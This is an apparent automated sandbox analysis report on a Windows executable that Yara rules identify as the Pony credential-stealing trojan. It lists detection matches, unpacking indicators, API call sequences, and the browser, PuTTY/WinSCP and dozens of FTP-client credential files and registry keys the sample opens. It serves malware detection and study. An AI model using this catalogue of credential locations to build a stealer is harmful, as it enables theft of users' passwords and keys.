Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net

Source: 8WgZHDQckx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@15/4

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,

0_2_0040D1E9

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_004027AF LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,

0_2_004027AF

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_00402B2A WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,

0_2_00402B2A

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_0040A6AF CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

0_2_0040A6AF

Source: 8WgZHDQckx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 8WgZHDQckx.exe, 00000000.00000003.1688795172.0000000000884000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 8WgZHDQckx.exe

ReversingLabs: Detection: 94%

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: 8WgZHDQckx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: w:\google_prj\src\tiger4_v3_2.pdbU source: 8WgZHDQckx.exe
Source:	Binary string: w:\google_prj\src\tiger4_v3_2.pdb source: 8WgZHDQckx.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Unpacked PE file: 0.2.8WgZHDQckx.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Unpacked PE file: 0.2.8WgZHDQckx.exe.400000.0.unpack

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_0040231D LoadLibraryA,GetProcAddress,

0_2_0040231D

Source: 8WgZHDQckx.exe

Static PE information: real checksum: 0x255c8 should be: 0x651d9

Source: 8WgZHDQckx.exe

Static PE information: section name: .text entropy: 6.970578891686763

Source: C:\Users\user\Desktop\8WgZHDQckx.exe TID: 6512

Thread sleep time: -90000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	0_2_00405024
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00404CB4
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_0040891F
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00403FE7
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_0040966C
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_0040879B

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_0040443E GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_0040443E

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_0040231D LoadLibraryA,GetProcAddress,

0_2_0040231D

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_3_00610380 mov edx, dword ptr fs:[00000030h]		0_3_00610380
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040F731 mov eax, dword ptr fs:[00000030h]		0_2_0040F731

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_004102E0 SetUnhandledExceptionFilter,RevertToSelf,

0_2_004102E0

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_00410042 lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle,

0_2_00410042

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_00404313 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00404313

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_0040443E

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_0041022F OleInitialize,GetUserNameA,

0_2_0041022F

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Code function: 0_2_0040443E GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_0040443E

Stealing of Sensitive Information

Yara detected Pony

Source: Yara match	File source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\SiteDesigner\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Program Files (x86)\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Program Files (x86)\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Roaming\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\ProgramData\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat	Jump to behavior
